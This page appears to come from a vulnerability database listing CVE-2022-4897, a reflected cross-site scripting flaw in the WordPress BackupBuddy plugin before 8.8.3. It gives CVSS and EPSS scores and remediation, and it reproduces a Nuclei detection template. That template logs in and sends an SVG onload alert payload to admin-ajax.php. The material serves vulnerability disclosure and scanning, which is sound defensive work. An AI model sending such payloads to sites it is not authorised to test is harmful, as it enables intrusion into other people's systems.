Lucene search
ProjectDiscoveryNUCLEI:CVE-2022-4897HistoryMar 05, 2023 - 1:42 p.m.
WordPress BackupBuddy <8.8.3 - Cross Site Scripting
2023-03-0513:42:10
ProjectDiscovery
github.com
11
cve
cross site scripting
backupbuddy
wordpress
plugin
wpscan
ithemes
authenticated
CVSS3
6.1
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
EPSS
0.004
Percentile
75.0%
WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
id: CVE-2022-4897
info:
name: WordPress BackupBuddy <8.8.3 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: Fixed in version 8.8.3.
reference:
- https://wpscan.com/vulnerability/7b0eeafe-b9bc-43b2-8487-a23d3960f73f
- https://nvd.nist.gov/vuln/detail/CVE-2022-4897
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-4897
cwe-id: CWE-79
epss-score: 0.00486
epss-percentile: 0.75995
cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: ithemes
product: backupbuddy
framework: wordpress
tags: cve,cve2022,xss,backupbuddy,wordpress,wp-plugin,wpscan,wp,authenticated,ithemes
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "onload=alert(document.domain)")'
- 'contains(body_2, "BackupBudddy iFrame")'
condition: and
# digest: 4b0a00483046022100bb17d717cfb49161b5dcc3386a53765abb55ebdc47feae0fb340a0a0e4e1f861022100d13e12abf5f2d7814125b0581f7bc28f5a444d5d6fdf66bfb32bc5989d271f38:922c64590222798bb761d5b6d8e72950Related
cve
cve
CVE-2022-4897
2023-02-21 09:15:11
wpvulndb
wpvulndb
BackupBuddy < 8.8.3 - Multiple Reflected Cross-Site Scripting
2023-01-30 00:00:00
nvd
nvd
CVE-2022-4897
2023-02-21 09:15:11
prion
prion
Cross site scripting
2023-02-21 09:15:00
cvelist
cvelist
CVE-2022-4897 BackupBuddy < 8.8.3 - Multiple Reflected Cross-Site Scripting
2023-02-21 08:50:50
wpexploit
wpexploit
BackupBuddy < 8.8.3 - Multiple Reflected Cross-Site Scripting
2023-01-30 00:00:00
wordfence
wordfence
CVSS3
6.1
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
EPSS
0.004
Percentile
75.0%
Related for NUCLEI:CVE-2022-4897